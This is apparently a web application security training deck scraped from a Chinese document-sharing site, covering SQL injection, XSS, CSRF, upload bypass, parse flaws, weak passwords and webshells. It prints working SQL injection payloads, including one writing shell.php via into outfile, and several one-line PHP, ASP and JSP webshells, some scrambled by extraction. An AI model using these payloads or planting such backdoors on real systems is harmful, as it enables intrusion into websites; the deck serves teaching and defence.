




版权说明:本文档由用户提供并上传,收益归属内容提供方,若内容存在侵权,请进行举报或认领
文档简介
1、WEB应用安全培训常见WEB漏洞常见WEB后门介绍漏洞名称漏洞名称漏洞等级漏洞等级SQL注入高危跨站脚本攻击漏洞高危Cookie欺骗高危CSRF(跨站请求伪造)中危Web信息泄露中危权限问题中危逻辑漏洞中危第三方程序漏洞高危Web服务器解析漏洞高危弱口令高危SSRF中危常见的Web漏洞SQL注入 漏洞介绍 由于程序中对用户输入检查不严格,用户可以提交一段数据库查询代码,根据程序返回的结果,获得某些他想得知的数据,这就是所谓的SQL Injection,即SQL注入。 原因分析 其本质是由于对输入检查不充分,导致SQL语句将用户提交的非法数据当作语句的一部分来执行。SQL注入SQL注入分类: 按
2、提交字符类型可分为: 数字型 字符型 搜索型 按HTTP提交方式可分为: GET、POST、Cookie 按注入方式可分为: 盲注 、 union注入、 报错注入、 基于时间注入 编码问题:宽字节注入SQL注入如何判断?1.单引号判断2.数字型注入判断and 1=1 and 1=2 and 1 is null and 1 is not null and user0参数进行运算 +1 -1 +%2B3.字符型注入判断 and 1=1 and 1=24.搜索型注入判断test% and 1=1 and %= test% and 1=2 and %=SQL注入-相关表Sysobjects, sysc
3、olumnsInformation_schema. TABLESTable_schematable_nameInformation_schema. COLUMNSuser_tab_columnsuser_tables SQL注入-盲注Access and (select top 1 asc(mid(id,1,1) from admin)0MSSQLand (select top 1 ascii(substring(password,1,1) fromadmin)0MysqlAnd(select ascii(substr(pass,1,1)from admin limit 1)0oracle A
4、nd(select ascii(substr(pass,1,1)form admin where rownum=1)0SQL注入-报错and (select top 1 name from sysobjects)=1and (select 1 from (selectcount(*),concat(version(),floor(rand(0)*2)x frominformation_schema.tables group by x)a)%23|utl_inaddr.get_host_name(select banner from v$version where rownum=1) SQL注入
5、MySQL写文件http:/ and 1=2 union select 1,2,4,5,6 into outfile C:/apache/htdocs/site/shell.phpLoad_file(读取文件的路径)SQL注入搜索型注入Select 相应字段 from 表名 where 搜索条件 Like 科技% and 1=1 and %=%搜索关键字% and payload and %=SQL注入自动化工具 SQLMAPSQL注入自动化工具 HavijSQL注入自动化工具 PangolinXSS跨站脚本攻击 漏洞介绍漏洞介绍 恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之
6、时,嵌入其中Web里面的html代码会被执行,从而达到恶意攻击用户的特殊目的。 XSS本质是在于执行脚本javascript/html等攻击者的js能力越强攻击效果越惊人! XSS漏洞分类:反射型XSS 存储型XSSXSS跨站脚本攻击XSS的危害通过XSS执行的javascript,可以做到 窃取你正在浏览的cookies信息 篡改你正在浏览的页面,注入误导信息 捕获你的所有操作,并发送给黑客 从定向到黑客的钓鱼站点 利用浏览器的漏洞控制你的机器 持久型跨站脚本攻击场景1. 正常服务器信息2. 服务器存储恶意代码3. 用户浏览网页4. 服务器将恶意代码返回给用户5. 客户端浏览器执行恶意代码W
7、eb服务器 重要通知Re:沙发!Re:地板?Re:地下室沙发Re:地下室地板-_-!Re:免费获取Q币!内容:恶意代码Re:谁又发垃圾广告啦?1普通用户客户端34恶意代码 执行!5攻击者在论坛发帖子:免费获取Q币!恶意代码2XSS跨站脚本攻击注册用户发帖,内容如下所示XSS跨站脚本攻击Admin用户登录浏览刚才的帖子非持久型跨站脚本攻击场景浏览器浏览器Outlook正常访问恶意代码隐藏在链接中“reflected”代码1From:攻击者To:用户免费赠送Q币!CLICK HERE恶意代码安全上下文:目标站点普通合法会话安全上下文:目标站点攻击者Web服务器普通用户客户端12345恶意代码 执行
8、!XSS跨站脚本攻击反射型XSSXSS跨站脚本攻击XSS攻击平台CSRF跨站请求伪造CSRF是什么?nCSRF(Cross-site request forgery)跨站请求伪造 。n你这可以这么理解CSRF攻击:攻击者盗用了你的身份,以你的名义发送恶意请求。CSRF能够做的事情包括:以你名义发送邮件,发消息,盗取你的账号,甚至于购买商品,虚拟货币转账.造成的问题包括:个人隐私泄露以及财产安全。跨站请求伪造(CSRF)场景攻击者:小明 受害人:老王 银行网站:恶意网站:www.B.com1.A银行转账链接:http:/ Cookie 用于身份验证 本地可控Cookie欺骗示意图通过用户名密码认
9、证后将用户信息存储在Cookie里.但是在做Cookie认证的时候,只读取了Cookie里面的用户名信息.验证不充分之上传漏洞 客户端检测(javascript扩展名检测) 浏览器禁用JavaScript 服务端检测(MIME类型检测) 伪造Content-type: image/gif 服务端检测(文件头检测) 伪造文件头(GIF89a) 服务端检测(目录路径检测) %00截断 服务端检测(文件扩展名检测) 白名单 黑名单验证不充分之文件包含易受攻击的代码片断: 攻击者用如下请求可以包含图片木马:http:/ 上面的代码首先检查用户的密码是否为hello,如果匹配的话,设置$auth为1,即
10、通过认证。之后如果$suth为1的话,就会显示一些重要信息。这段代码假定$auth在没有设置值的时候是空的,但是攻击者可以创建任何全局变量并赋值,通过类似http:/ 不同的用户错误 判断出存在admin用户逻辑漏洞找回密码设计缺陷 修改任意用户密码解析漏洞IIS 6.0解析漏洞目录解析/test.asp/test.jpg文件解析/test.asp;1.jpgIIS6.0 默认的可执行文件除了asp还包含这三种/test.asa/test.cer/test.cdx解析漏洞Apache解析漏洞Apache 是从右到左开始判断解析,如果为不可识别解析,就再往左判断。/test.php.xxx/te
11、st.php.rar解析漏洞Nginx解析漏洞影响版本:0.5.,0.6., 0.7 = 0.7.65, 0.8 = 0.8.37/test.jpg/1.php/test.jpg%00.php第三方漏洞FCKeditor 编辑器上传漏洞,任意创建文件漏洞eWebEeditor编辑器,上传漏洞,遍历目录漏洞ThinkPHP任意代码执行漏洞Struts2远程命令执行漏洞Web中间件(Tomcat、Weblogic、Jboss)Struts2远程命令执行tomcatJBossFckeditor/ewebeditor/kindeditor 遍历目录 上传漏洞 构造相应语句弱口令什么是弱口令?什么是弱口
12、令? 弱口令(weak password) 没有严格和准确的定义,通常认为容易被别人(他们有可能对你很了解)猜测到或被破解工具破解的口令均为弱口令。 弱口令指的是仅包含简单数字和字母的口令,例如“123”、“abc”等,因为这样的口令很容易被别人破解,从而使用户的计算机面临风险,因此不推荐用户使用。 弱口令 TOMCAT弱口令直接上传弱口令直接上传WEBSHELL弱口令 针对弱口令的爆破针对弱口令的爆破 Burpsuite、Hydra等等常见WEB后门介绍什么是WEBSHELL?顾名思义,“web”的含义是显然需要服务器开放web服务“shell”的含义是取得对服务器某种程度上操作权限。web
13、shell常常被称为匿名用户(入侵者)通过网站端口对网站服务器的某种程度上操作的权限。由于webshell其大多是以动态脚本的形式出现,也有人称之为网站的后门工具。常见WEB后门介绍PHP后门木马常用函数执行系统命令: system(), passthru(), shell_exec(), exec(), popen(), proc_open()代码执行与加密: eval(), assert(), call_user_func(),base64_decode(), gzinflate(),gzuncompress(), gzdecode(), str_rot13()文件包含与生成: requi
14、re(), require_once(), include(), include_once(),file_get_contents(), file_put_contents(), fputs(), fwrite()WEB后门介绍最常见的一句话木马:隐蔽的一句话木马:完全无特征一句话木马:http:/localhost/test.php?1=assert 密码:2% ) )fequest(.MapPath(ReAs(Serverles(0).SavRequest.FiThen 0 les.Count Request.Fi If % ); )fequest.MapPath(ReAs(Serverl
15、es0.SavRequest.Fi 0)=!iles.Count(Request.F %if);%unsafe,wtem(Request.IWrite(eval%Response.% false=equest validateRJscript=Language Page %);%unsafe,passest.Item%eval(RequJscript%=Language Page %();).getBytest(tParameterrequest.ge).write(f(tParameterrequest.ge+)RealPath(cation.getream(applileOutputStj
16、ava.io.Fi null)(new=)!fter(.getParameif(request%一句话句话JSP限制的一句话?/scriptphp=languagescript /OO?);error,h,$_POST/email/eace(preg_repl?php)?sc,$_POSTsb($_POSTsa?$_POST?);sb($_POSTsa?$_POST?OSTsb);assert($_P ?phpSTsb)?eval($_PO ?phpTsb)?eval($_POS ?php%);)+名字(lcx.性别lcx.;请叫我一声老大 : 昵称 ,18 : 年龄 eval, : 性别 ),#rm(Request.fo : 名字 =lcx var %=65001%CODEPAGE JAVASCRIPT=%LANGUAGEif end )sbrequest( balExecuteGlo then )sbRequest( if)%sbrequest( obal%
温馨提示
- 1. 本站所有资源如无特殊说明,都需要本地电脑安装OFFICE2007和PDF阅读器。图纸软件为CAD,CAXA,PROE,UG,SolidWorks等.压缩文件请下载最新的WinRAR软件解压。
- 2. 本站的文档不包含任何第三方提供的附件图纸等,如果需要附件,请联系上传者。文件的所有权益归上传用户所有。
- 3. 本站RAR压缩包中若带图纸,网页内容里面会有图纸预览,若没有图纸预览就没有图纸。
- 4. 未经权益所有人同意不得将文件中的内容挪作商业或盈利用途。
- 5. 人人文库网仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对用户上传分享的文档内容本身不做任何修改或编辑,并不能对任何下载内容负责。
- 6. 下载文件中如有侵权或不适当内容,请与我们联系,我们立即纠正。
- 7. 本站不保证下载资源的准确性、安全性和完整性, 同时也不承担用户因使用这些下载资源对自己和他人造成任何形式的伤害或损失。
评论
0/150
提交评论